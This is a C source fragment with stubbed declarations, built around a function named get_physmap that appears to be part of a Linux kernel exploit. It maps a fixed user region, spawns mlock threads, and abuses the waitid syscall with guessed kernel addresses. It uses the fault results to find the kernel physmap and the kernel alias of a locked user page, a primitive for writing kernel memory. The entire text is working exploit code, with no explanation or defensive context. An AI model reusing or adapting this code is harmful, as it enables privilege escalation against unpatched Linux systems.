
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct PagePair {unsigned long userland_page; unsigned long kernel_page; } ;
typedef int pthread_t ;


 int MAP_ANONYMOUS ;
 int MAP_FIXED ;
 int MAP_SHARED ;
 int PROT_READ ;
 int PROT_WRITE ;
 int P_ALL ;
 int SYS_waitid ;
 int WEXITED ;
 int done_locking ;
 int errno ;
 int exit (int) ;
 char* mapping_base ;
 int mapping_begin ;
 long* mapping_changed () ;
 int memset (long*,int,int) ;
 int mlock_thread ;
 long* mmap (void*,int,int,int,int,int ) ;
 int perror (char*) ;
 int printf (char*,...) ;
 scalar_t__ pthread_create (int *,int *,int ,int *) ;
 int syscall (int ,int ,int ,...) ;

void get_physmap(struct PagePair *pp) {



  unsigned long base = 0x100000000;
  mapping_base = (char*)base;

  long* a = mmap((void*)base, 0x10000000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0);
  if ((long)a == -1) {
    printf("mmap failed\n");
    perror("mmap");
    exit(-1);
  }
  printf("mapped %p\n", a);
  memset(a, 0x41, 0x10000000);

  done_locking = 0;
  int j = 0;
  for(j = 0; j < 4; j++) {
    pthread_t th1;
    if(pthread_create(&th1, ((void*)0), mlock_thread, ((void*)0))) {
      printf("mlock thread create error\n");
      exit(0);
    }
  }


  unsigned long curr_guess = mapping_begin-0x80000000;
  printf("trying to find physmap mapping\n");
  while(1) {

    int res = syscall(SYS_waitid, P_ALL, 0, curr_guess+0xfe0, WEXITED, ((void*)0));
    if (errno != 14) {
      printf("found mapping at %p\n", (void*)curr_guess);
      curr_guess += 0x80000000;
      break;
    }
    curr_guess += 0x10000000;
  }

  long *locked_mapping = ((void*)0);
  long *locked_kernel_mapping = ((void*)0);
  while(1) {

    curr_guess += 0x1000000;
    int res = syscall(SYS_waitid, P_ALL, 0, curr_guess, WEXITED, ((void*)0));
    if (locked_mapping = mapping_changed()) {
      locked_kernel_mapping = (long*)curr_guess;
      printf("detected change at %p\n", (void*)curr_guess);
      break;
    }
  }


  locked_mapping[0] = 0x41414141;
  syscall(SYS_waitid, P_ALL, 0, locked_kernel_mapping, WEXITED, ((void*)0));
  syscall(SYS_waitid, P_ALL, 0, &locked_kernel_mapping[100], WEXITED, ((void*)0));
  if (locked_mapping[0] != 0 || locked_mapping[100] != 0) {
    printf("second write didn't work...");
  }
  printf("physmap addr is good\n");
  if(pp) {
    pp->userland_page = (unsigned long)locked_mapping;
    pp->kernel_page = (unsigned long)locked_kernel_mapping;
  }
  done_locking = 1;

}
